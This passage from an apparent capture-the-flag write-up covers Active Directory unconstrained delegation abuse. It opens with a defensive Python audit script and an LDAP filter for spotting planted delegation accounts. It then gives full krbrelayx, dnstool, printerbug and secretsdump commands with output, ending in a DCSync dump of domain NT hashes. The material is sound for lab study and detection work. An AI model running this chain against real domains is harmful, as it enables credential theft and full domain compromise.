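To make the 528384 concrete, and to give the defender the matching check, here is an added example (mine, not Powermad's, bloodyAD's or the box author's) that decodes and encodes userAccountControl bits and audits a directory snapshot for accounts that are trusted for unconstrained delegation without being domain controllers, exactly the state PWNED$ and UwU$ are left in. The flag values are the documented ADS_USER_FLAG constants; the sample snapshot is constructed, and the UwU$ value assumes bloodyAD OR-ed the flag onto a fresh computer account's default 0x1000.

```python
"""
userAccountControl helpers: decode/encode the flag bits and audit a directory
snapshot for accounts with unconstrained delegation that are not domain
controllers.  Added example (not Powermad, bloodyAD or the box author's code);
flag values are the ADS_USER_FLAG constants, the sample accounts are constructed.
"""
from typing import Iterable, List, Tuple

UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",               # domain controller
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",            # unconstrained delegation
    0x100000: "NOT_DELEGATED",
    0x400000: "DONT_REQ_PREAUTH",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",  # constrained delegation with protocol transition
}
FLAG_BY_NAME = {name: bit for bit, name in UAC_FLAGS.items()}


def decode_uac(value: int) -> List[str]:
    """Names of the known flags set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def encode_uac(*names: str) -> int:
    """OR the named flags together, e.g. encode_uac('WORKSTATION_TRUST_ACCOUNT', 'TRUSTED_FOR_DELEGATION')."""
    value = 0
    for name in names:
        value |= FLAG_BY_NAME[name]
    return value


# The same audit against a live directory: bitwise-AND matching rule on userAccountControl
# (524288 = TRUSTED_FOR_DELEGATION, 8192 = SERVER_TRUST_ACCOUNT).
LDAP_FILTER_UNCONSTRAINED_NON_DC = (
    "(&(userAccountControl:1.2.840.113556.1.4.803:=524288)"
    "(!(userAccountControl:1.2.840.113556.1.4.803:=8192)))"
)


def find_unconstrained_non_dc(accounts: Iterable[Tuple[str, int]]) -> List[str]:
    """sAMAccountNames carrying TRUSTED_FOR_DELEGATION that are not DCs.
    Every hit is either a misconfiguration or an attacker-planted account."""
    trusted = FLAG_BY_NAME["TRUSTED_FOR_DELEGATION"]
    dc = FLAG_BY_NAME["SERVER_TRUST_ACCOUNT"]
    return [name for name, uac in accounts if uac & trusted and not uac & dc]


# Constructed snapshot of (sAMAccountName, userAccountControl). DC1$ has the normal DC value;
# PWNED$ is the 528384 written with Powermad above; UwU$ assumes bloodyAD OR-ed the flag onto
# a fresh computer account's default 0x1000.
SAMPLE_ACCOUNTS = [
    ("DC1$", encode_uac("SERVER_TRUST_ACCOUNT", "TRUSTED_FOR_DELEGATION")),
    ("PWNED$", 528384),
    ("UwU$", 0x1000 | 0x80000),
    ("N.Thompson", encode_uac("NORMAL_ACCOUNT", "DONT_EXPIRE_PASSWORD")),
]

if __name__ == "__main__":
    print(528384, "=", " | ".join(decode_uac(528384)))
    print("unconstrained delegation on non-DC accounts:", find_unconstrained_non_dc(SAMPLE_ACCOUNTS))
```

Running the LDAP filter on a schedule (or alerting on event 4742 where the new userAccountControl contains 0x80000 for an account the DC admins did not touch) catches both of the planted accounts in this writeup within minutes of their creation.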
Set up the listener with the NT hash of PWNED$ (the NT hash of 12345; the secretsdump output at the end confirms it) and wait for a connection. Two of the three incoming connections fell back to NTLM ("Unsupported MechType NTLMSSP"), which krbrelayx cannot use in this mode; the one Kerberos authentication is enough to get the TGT. The output below was captured after the coercion that follows:
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 krbrelayx.py -hashes :7A21990FCD3D759941E45C490F143D5F
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.105.77
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.10.105.77
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.10.105.77
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
Add the DNS record PWNED.delegate.vl pointing at the attacker (10.8.2.138), then trigger the coercion with printerbug.py, authenticating as PWNED$ against dc1 and naming PWNED.delegate.vl as the host the DC should connect back to. The rpc_s_access_denied at the end is printerbug's usual response and does not mean failure; the listener output above is the confirmation:
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 dnstool.py -u 'delegate.vl\pwned$' -p 12345 -r PWNED.delegate.vl -d 10.8.2.138 --action add -dns-ip 10.10.105.77 DC1.delegate.vl
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully

┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ ls
addspn.py  'DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache'  krbrelayx.py  LICENSE     printerbug.py  venv
bloodyAD   dnstool.py                                    lib           PetitPotam  README.md

┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 printerbug.py delegate.vl/'PWNED$'@dc1.delegate.vl PWNED.delegate.vl
[*] Impacket v0.11.0 - Copyright 2023 Fortra

Password:12345
[*] Attempting to trigger authentication via rprn RPC at dc1.delegate.vl
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Triggered RPC backconnect, this may or may not have worked

┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
Use the captured DC1$ TGT with impacket-secretsdump (DCSync over DRSUAPI) to dump the NT hashes of every domain account. -k makes impacket take the ticket from the ccache in KRB5CCNAME, so no password is needed. klist shows the ticket is good for about ten hours and renewable for a week; the dump has to happen before it expires.
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ export KRB5CCNAME=$(pwd)/DC1\$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache

┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ klist
Ticket cache: FILE:/home/puck/vulnhub/delegate/krbrelayx/DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
Default principal: DC1$@DELEGATE.VL

Valid starting       Expires              Service principal
06/12/2024 07:13:23  06/12/2024 17:07:36  krbtgt/DELEGATE.VL@DELEGATE.VL
	renew until 06/19/2024 07:07:36

┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ impacket-secretsdump -k DC1.delegate.vl -just-dc-ntlm
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32<REDACTED>e93:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:54999c1daa89d35fbd2e36d01c4a2cf2:::
A.Briggs:1104:aad3b435b51404eeaad3b435b51404ee:8e5a0462f96bc85faf20378e243bc4a3:::
b.Brown:1105:aad3b435b51404eeaad3b435b51404ee:deba71222554122c3634496a0af085a6:::
R.Cooper:1106:aad3b435b51404eeaad3b435b51404ee:17d5f7ab7fc61d80d1b9d156f815add1:::
J.Roberts:1107:aad3b435b51404eeaad3b435b51404ee:4ff255c7ff10d86b5b34b47adc62114f:::
N.Thompson:1108:aad3b435b51404eeaad3b435b51404ee:4b514595c7ad3e2f7bb70e7e61ec1afe:::
DC1$:1000:aad3b435b51404eeaad3b435b51404ee:6d93f6dbd8902d77f43e04bb1b1b5c6e:::
PWNED$:3101:aad3b435b51404eeaad3b435b51404ee:7a21990fcd3d759941e45c490f143d5f:::
[*] Cleaning up...

┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
What a ride.